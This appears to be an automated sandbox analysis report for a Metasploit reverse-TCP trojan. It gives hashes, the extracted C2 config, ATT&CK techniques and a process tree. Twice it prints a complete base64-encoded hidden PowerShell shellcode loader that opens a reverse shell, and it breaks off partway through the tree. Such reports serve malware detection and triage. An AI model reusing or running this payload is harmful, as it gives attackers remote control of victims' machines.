metasploit | 32a9c4aca0a172b9d4fa886e4ad3567ac90cec76d165237a9d93624f3b833f11

General

Target

32a9c4aca0a172b9d4fa886e4ad3567ac90cec76d165237a9d93624f3b833f11.exe
Size

17KB
MD5

d9b2484af12098d68ac2c39e5962ce60
SHA1

94d52e1d9abb4d83a32d38180633a11a64249e01
SHA256

32a9c4aca0a172b9d4fa886e4ad3567ac90cec76d165237a9d93624f3b833f11
SHA512

6bdfc11db4365a22f639b6881d531e31d7bac37accc2cdb6d6b7cec82fbc91e7f7ebe8e0d24357dab1dd1f7cdb6f1058f4b9f96098358d373f74395af307f706
SSDEEP

384:HEEoLO56ayzcMj+/4y8qYj1jewPbcY5+INel1nfTJYQV:kE8O56lcV/4yrwPbcU+INenfTSQV

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.1.110:4444

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4156	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4156	powershell.exe
4156	powershell.exe
1152	powershell.exe
1152	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	1152	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 4644 wrote to memory of 2928	4644	32a9c4aca0a172b9d4fa886e4ad3567ac90cec76d165237a9d93624f3b833f11.exe	83
PID 4644 wrote to memory of 2928	4644	32a9c4aca0a172b9d4fa886e4ad3567ac90cec76d165237a9d93624f3b833f11.exe	83
PID 2928 wrote to memory of 4156	2928	cmd.exe	84
PID 2928 wrote to memory of 4156	2928	cmd.exe	84
PID 4156 wrote to memory of 1152	4156	powershell.exe	85
PID 4156 wrote to memory of 1152	4156	powershell.exe	85
PID 4156 wrote to memory of 1152	4156	powershell.exe	85
PID 1152 wrote to memory of 772	1152	powershell.exe	86
PID 1152 wrote to memory of 772	1152	powershell.exe	86
PID 1152 wrote to memory of 772	1152	powershell.exe	86
PID 772 wrote to memory of 4112	772	csc.exe	87
PID 772 wrote to memory of 4112	772	csc.exe	87
PID 772 wrote to memory of 4112	772	csc.exe	87

C:\Users\Admin\AppData\Local\Temp\32a9c4aca0a172b9d4fa886e4ad3567ac90cec76d165237a9d93624f3b833f11.exe
"C:\Users\Admin\AppData\Local\Temp\32a9c4aca0a172b9d4fa886e4ad3567ac90cec76d165237a9d93624f3b833f11.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAAwADAAOAAgAD0AIAAnACQAOABBADIAQgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAA4AEEAMgBCACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAOAAsADAAeAAyADUALAAwAHgANABhACwAMAB4ADgAYgAsADAAeABlADAALAAwAHgAZABiACwAMAB4AGMAYwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAAwADMALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAYwBiACwAMAB4AGIANgAsADAAeAA2ADkALAAwAHgAMQA1ACwAMAB4AGUAZgAsADAAeABhAGYALAAwAHgAZQAxACwAMAB4AGQANgAsADAAeAAwAGYALAAwAHgAMwAwACwAMAB4ADkAZQAsADAAeABlADcALAAwAHgAZABkACwAMAB4AGIAOQAsADAAeABiAGIALAAwAHgANgBjACwAMAB4ADYAYQAsADAAeABlAGIALAAwAHgANwAzACwAMAB4AGUANgAsADAAeAAzAGUALAAwAHgAMAAwACwAMAB4AGYAZgAsADAAeABhAGEALAAwAHgAYQBhACwAMAB4ADEANwAsADAAeAA0ADgALAAwAHgAMAAwACwAMAB4AGYANAAsADAAeABhAGMALAAwAHgAYwA0ACwAMAB4AGIAZAAsADAAeABjADkALAAwAHgANABkACwAMAB4ADEAOQAsADAAeAA3AGUALAAwAHgAOAA1ACwAMAB4ADgAZQAsADAAeAAzAGIALAAwAHgAMAAyACwAMAB4AGQANwAsADAAeABjADIALAAwAHgAOQBiACwAMAB4ADMAYgAsADAAeAAxADgALAAwAHgAMQA3ACwAMAB4AGQAZAAsADAAeAA3AGMALAAwAHgAZQBmACwAMAB4ADUAZAAsADAAeAAzADIALAAwAHgAZAAwACwAMAB4AGIAOAAsADAAeAAxADYALAAwAHgAOQBlACwAMAB4AGMANQAsADAAeABjAGQALAAwAHgANgBiACwAMAB4ADIAMwAsADAAeABlADcALAAwAHgAMAAxACwAMAB4AGUAMAAsADAAeAAxAGIALAAwAHgAOQBmACwAMAB4ADIANAAsADAAeAAzADcALAAwAHgAZQBmACwAMAB4ADEAMwAsADAAeAAyADcALAAwAHgANgA4ACwAMAB4ADkAYgAsADAAeABmADQALAAwAHgAMAA3ACwAMAB4AGQAOAAsADAAeAAxADcALAAwAHgANABjACwAMAB4ADUAZgAsADAAeABkADkALAAwAHgAZgA0ACwAMAB4AGMAOAAsADAAeAA5ADYALAAwAHgAYQBkACwAMAB4AGMANgAsADAAeABlADMALAAwAHgAZAA3ACwAMAB4ADAANwAsADAAeABiAGMALAAwAHgAMwAwACwAMAB4AGEAYwAsADAAeAA5ADkALAAwAHgAMQA0ACwAMAB4ADAAOQAsADAAeAA3ADIALAAwAHgAMwA1ACwAMAB4ADUAOQAsADAAeABhADUALAAwAHgANwBmACwAMAB4ADQANwAsADAAeAA5AGQALAAwAHgAMAAyACwAMAB4ADkAZgAsADAAeAAzADIALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeAAyADIALAAwAHgANAA1ACwAMAB4ADIAZQAsADAAeAAwAGEALAAwAHgAZgA4ACwAMAB4AGMAMAAsADAAeABiADEALAAwAHgAYQBjACwAMAB4ADgAYgAsADAAeAA3ADMALAAwAHgAMQA2ACwAMAB4ADQAYwAsADAAeAA1ADgALAAwAHgAZQA1ACwAMAB4AGQAZAAsADAAeAA0ADIALAAwAHgAMQA1ACwAMAB4ADYAMQAsADAAeABiADkALAAwAHgANAA2ACwAMAB4AGEAOAAsADAAeABhADYALAAwAHgAYgAxACwAMAB4ADcAMwAsADAAeAAyADEALAAwAHgANAA5ACwAMAB4ADEANgAsADAAeABmADIALAAwAHgANwAxACwAMAB4ADYAZQAsADAAeABiADIALAAwAHgANQBlACwAMAB4ADIAMgAsADAAeAAwAGYALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA4ADUALAAwAHgAMwAwACwAMAB4AGYAMwAsADAAeABlADMALAAwAHgANwBhACwAMAB4ADkANQAsADAAeAA3AGYALAAwAHgAMAAxACwAMAB4ADYAZAAsADAAeABhADkALAAwAHgANwBmACwAMAB4AGQAOQAsADAAeAA5ADIALAAwAHgAZgA3ACwAMAB4ADEANwAsADAAeAAxADUALAAwAHgANQBlACwAMAB4ADAAOAAsADAAeABlADgALAAwAHgAMwAxACwAMAB4AGUAOQAsADAAeAA3AGIALAAwAHgAZABhACwAMAB4ADkAZQAsADAAeAA0ADEALAAwAHgAMQA0ACwAMAB4ADUANgAsADAAeAA1ADYALAAwAHgANABmACwAMAB4AGUAMwAsADAAeABlAGYALAAwAHgANwAwACwAMAB4ADcAMAAsADAAeAAzAGIALAAwAHgANQA3ACwAMAB4ADEAMAAsADAAeAA4AGYALAAwAHgAYgBjACwAMAB4AGEAOAAsADAAeAAzADgALAAwAHgANABiACwAMAB4AGUAOAAsADAAeABmADgALAAwAHgANQAyACwAMAB4ADcAYQAsADAAeAA5ADEALAAwAHgAOQAyACwAMAB4AGEAMgAsADAAeAA4ADMALAAwAHgANAA0ACwAMAB4ADAAZQAsADAAeABhADkALAAwAHgAMQAzACwAMAB4AGEANwAsADAAeAA2ADcALAAwAHgAYQBjACwAMAB4ADgAZAAsADAAeAA0AGYALAAwAHgANwBhACwAMAB4AGEAZgAsADAAeAA0ADAALAAwAHgAYwBjACwAMAB4AGYAMwAsADAAeAA0ADkALAAwAHgAMwAyACwAMAB4AGIAYwAsADAAeAA1ADMALAAwAHgAYwA2ACwAMAB4AGYAMgAsADAAeAA2AGMALAAwAHgAMQA0ACwAMAB4AGIANgAsADAAeAA5AGEALAAwAHgANgA2ACwAMAB4ADkAYgAsADAAeABlADkALAAwAHgAYgBhACwAMAB4ADgAOAAsADAAeAA3ADEALAAwAHgAOAAyACwAMAB4ADUAMAAsADAAeAA2ADcALAAwAHgAMgBjACwAMAB4AGYAYQAsADAAeABjAGMALAAwAHgAMQBlACwAMAB4ADcANQAsADAAeAA3ADAALAAwAHgANgBkACwAMAB4AGQAZQAsADAAeABhADMALAAwAHgAZgBjACwAMAB4AGEAZAAsADAAeAA1ADQALAAwAHgANAAwACwAMAB4ADAAMAAsADAAeAA2ADMALAAwAHgAOQBkACwAMAB4ADIAZAAsADAAeAAxADIALAAwAHgAMQAzACwAMAB4ADYAZAAsADAAeAA3ADgALAAwAHgANAA4ACwAMAB4AGIANQAsADAAeAA3ADIALAAwAHgANQA2ACwAMAB4AGUANwAsADAAeAAzADkALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABhAGUALAAwAHgANgBlACwAMAB4ADkAZgAsADAAeAA1AGYALAAwAHgAOQA3ACwAMAB4ADUAOAAsADAAeAAwADAALAAwAHgAOQBmACwAMAB4AGYAMgAsADAAeABkADMALAAwAHgAOAA5ACwAMAB4ADMANQAsADAAeABiAGQALAAwAHgAOABiACwAMAB4AGYANQAsADAAeABkADkALAAwAHgAMwBkACwAMAB4ADQAYgAsADAAeABhADAALAAwAHgAYgAzACwAMAB4ADMAZAAsADAAeAAyADMALAAwAHgAMQA0ACwAMAB4AGUAMAAsADAAeAA2AGQALAAwAHgANQA2ACwAMAB4ADUAYgAsADAAeAAzAGQALAAwAHgAMAAyACwAMAB4AGMAYgAsADAAeABjAGUALAAwAHgAYgBlACwAMAB4ADcAMwAsADAAeABiADgALAAwAHgANQA5ACwAMAB4AGQANwAsADAAeAA3ADkALAAwAHgAZQA3ACwAMAB4AGEAZQAsADAAeAA3ADgALAAwAHgAOAAxACwAMAB4AGMAMgAsADAAeAAyAGUALAAwAHgANAA0ACwAMAB4ADUANAAsADAAeAAyAGEALAAwAHgANAA1ACwAMAB4AGEANAAsADAAeAA2ADQAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGgAWgBpAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABoAFoAaQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAaABaAGkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAAwADAAOAApACkAOwAkADUAZwA5ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAYgBtAFcAagAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABiAG0AVwBqACAAJAA1AGcAOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAA1AGcAOQAgACQAZQAiADsAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2928
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JAAwADAAOAAgAD0AIAAnACQAOABBADIAQgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAA4AEEAMgBCACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAOAAsADAAeAAyADUALAAwAHgANABhACwAMAB4ADgAYgAsADAAeABlADAALAAwAHgAZABiACwAMAB4AGMAYwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAAwADMALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAYwBiACwAMAB4AGIANgAsADAAeAA2ADkALAAwAHgAMQA1ACwAMAB4AGUAZgAsADAAeABhAGYALAAwAHgAZQAxACwAMAB4AGQANgAsADAAeAAwAGYALAAwAHgAMwAwACwAMAB4ADkAZQAsADAAeABlADcALAAwAHgAZABkACwAMAB4AGIAOQAsADAAeABiAGIALAAwAHgANgBjACwAMAB4ADYAYQAsADAAeABlAGIALAAwAHgANwAzACwAMAB4AGUANgAsADAAeAAzAGUALAAwAHgAMAAwACwAMAB4AGYAZgAsADAAeABhAGEALAAwAHgAYQBhACwAMAB4ADEANwAsADAAeAA0ADgALAAwAHgAMAAwACwAMAB4AGYANAAsADAAeABhAGMALAAwAHgAYwA0ACwAMAB4AGIAZAAsADAAeABjADkALAAwAHgANABkACwAMAB4ADEAOQAsADAAeAA3AGUALAAwAHgAOAA1ACwAMAB4ADgAZQAsADAAeAAzAGIALAAwAHgAMAAyACwAMAB4AGQANwAsADAAeABjADIALAAwAHgAOQBiACwAMAB4ADMAYgAsADAAeAAxADgALAAwAHgAMQA3ACwAMAB4AGQAZAAsADAAeAA3AGMALAAwAHgAZQBmACwAMAB4ADUAZAAsADAAeAAzADIALAAwAHgAZAAwACwAMAB4AGIAOAAsADAAeAAxADYALAAwAHgAOQBlACwAMAB4AGMANQAsADAAeABjAGQALAAwAHgANgBiACwAMAB4ADIAMwAsADAAeABlADcALAAwAHgAMAAxACwAMAB4AGUAMAAsADAAeAAxAGIALAAwAHgAOQBmACwAMAB4ADIANAAsADAAeAAzADcALAAwAHgAZQBmACwAMAB4ADEAMwAsADAAeAAyADcALAAwAHgANgA4ACwAMAB4ADkAYgAsADAAeABmADQALAAwAHgAMAA3ACwAMAB4AGQAOAAsADAAeAAxADcALAAwAHgANABjACwAMAB4ADUAZgAsADAAeABkADkALAAwAHgAZgA0ACwAMAB4AGMAOAAsADAAeAA5ADYALAAwAHgAYQBkACwAMAB4AGMANgAsADAAeABlADMALAAwAHgAZAA3ACwAMAB4ADAANwAsADAAeABiAGMALAAwAHgAMwAwACwAMAB4AGEAYwAsADAAeAA5ADkALAAwAHgAMQA0ACwAMAB4ADAAOQAsADAAeAA3ADIALAAwAHgAMwA1ACwAMAB4ADUAOQAsADAAeABhADUALAAwAHgANwBmACwAMAB4ADQANwAsADAAeAA5AGQALAAwAHgAMAAyACwAMAB4ADkAZgAsADAAeAAzADIALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeAAyADIALAAwAHgANAA1ACwAMAB4ADIAZQAsADAAeAAwAGEALAAwAHgAZgA4ACwAMAB4AGMAMAAsADAAeABiADEALAAwAHgAYQBjACwAMAB4ADgAYgAsADAAeAA3ADMALAAwAHgAMQA2ACwAMAB4ADQAYwAsADAAeAA1ADgALAAwAHgAZQA1ACwAMAB4AGQAZAAsADAAeAA0ADIALAAwAHgAMQA1ACwAMAB4ADYAMQAsADAAeABiADkALAAwAHgANAA2ACwAMAB4AGEAOAAsADAAeABhADYALAAwAHgAYgAxACwAMAB4ADcAMwAsADAAeAAyADEALAAwAHgANAA5ACwAMAB4ADEANgAsADAAeABmADIALAAwAHgANwAxACwAMAB4ADYAZQAsADAAeABiADIALAAwAHgANQBlACwAMAB4ADIAMgAsADAAeAAwAGYALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA4ADUALAAwAHgAMwAwACwAMAB4AGYAMwAsADAAeABlADMALAAwAHgANwBhACwAMAB4ADkANQAsADAAeAA3AGYALAAwAHgAMAAxACwAMAB4ADYAZAAsADAAeABhADkALAAwAHgANwBmACwAMAB4AGQAOQAsADAAeAA5ADIALAAwAHgAZgA3ACwAMAB4ADEANwAsADAAeAAxADUALAAwAHgANQBlACwAMAB4ADAAOAAsADAAeABlADgALAAwAHgAMwAxACwAMAB4AGUAOQAsADAAeAA3AGIALAAwAHgAZABhACwAMAB4ADkAZQAsADAAeAA0ADEALAAwAHgAMQA0ACwAMAB4ADUANgAsADAAeAA1ADYALAAwAHgANABmACwAMAB4AGUAMwAsADAAeABlAGYALAAwAHgANwAwACwAMAB4ADcAMAAsADAAeAAzAGIALAAwAHgANQA3ACwAMAB4ADEAMAAsADAAeAA4AGYALAAwAHgAYgBjACwAMAB4AGEAOAAsADAAeAAzADgALAAwAHgANABiACwAMAB4AGUAOAAsADAAeABmADgALAAwAHgANQAyACwAMAB4ADcAYQAsADAAeAA5ADEALAAwAHgAOQAyACwAMAB4AGEAMgAsADAAeAA4ADMALAAwAHgANAA0ACwAMAB4ADAAZQAsADAAeABhADkALAAwAHgAMQAzACwAMAB4AGEANwAsADAAeAA2ADcALAAwAHgAYQBjACwAMAB4ADgAZAAsADAAeAA0AGYALAAwAHgANwBhACwAMAB4AGEAZgAsADAAeAA0ADAALAAwAHgAYwBjACwAMAB4AGYAMwAsADAAeAA0ADkALAAwAHgAMwAyACwAMAB4AGIAYwAsADAAeAA1ADMALAAwAHgAYwA2ACwAMAB4AGYAMgAsADAAeAA2AGMALAAwAHgAMQA0ACwAMAB4AGIANgAsADAAeAA5AGEALAAwAHgANgA2ACwAMAB4ADkAYgAsADAAeABlADkALAAwAHgAYgBhACwAMAB4ADgAOAAsADAAeAA3ADEALAAwAHgAOAAyACwAMAB4ADUAMAAsADAAeAA2ADcALAAwAHgAMgBjACwAMAB4AGYAYQAsADAAeABjAGMALAAwAHgAMQBlACwAMAB4ADcANQAsADAAeAA3ADAALAAwAHgANgBkACwAMAB4AGQAZQAsADAAeABhADMALAAwAHgAZgBjACwAMAB4AGEAZAAsADAAeAA1ADQALAAwAHgANAAwACwAMAB4ADAAMAAsADAAeAA2ADMALAAwAHgAOQBkACwAMAB4ADIAZAAsADAAeAAxADIALAAwAHgAMQAzACwAMAB4ADYAZAAsADAAeAA3ADgALAAwAHgANAA4ACwAMAB4AGIANQAsADAAeAA3ADIALAAwAHgANQA2ACwAMAB4AGUANwAsADAAeAAzADkALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABhAGUALAAwAHgANgBlACwAMAB4ADkAZgAsADAAeAA1AGYALAAwAHgAOQA3ACwAMAB4ADUAOAAsADAAeAAwADAALAAwAHgAOQBmACwAMAB4AGYAMgAsADAAeABkADMALAAwAHgAOAA5ACwAMAB4ADMANQAsADAAeABiAGQALAAwAHgAOABiACwAMAB4AGYANQAsADAAeABkADkALAAwAHgAMwBkACwAMAB4ADQAYgAsADAAeABhADAALAAwAHgAYgAzACwAMAB4ADMAZAAsADAAeAAyADMALAAwAHgAMQA0ACwAMAB4AGUAMAAsADAAeAA2AGQALAAwAHgANQA2ACwAMAB4ADUAYgAsADAAeAAzAGQALAAwAHgAMAAyACwAMAB4AGMAYgAsADAAeABjAGUALAAwAHgAYgBlACwAMAB4ADcAMwAsADAAeABiADgALAAwAHgANQA5ACwAMAB4AGQANwAsADAAeAA3ADkALAAwAHgAZQA3ACwAMAB4AGEAZQAsADAAeAA3ADgALAAwAHgAOAAxACwAMAB4AGMAMgAsADAAeAAyAGUALAAwAHgANAA0ACwAMAB4ADUANAAsADAAeAAyAGEALAAwAHgANAA1ACwAMAB4AGEANAAsADAAeAA2ADQAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGgAWgBpAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABoAFoAaQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAaABaAGkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAAwADAAOAApACkAOwAkADUAZwA5ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAYgBtAFcAagAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABiAG0AVwBqACAAJAA1AGcAOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAA1AGcAOQAgACQAZQAiADsAfQA=
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4156
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
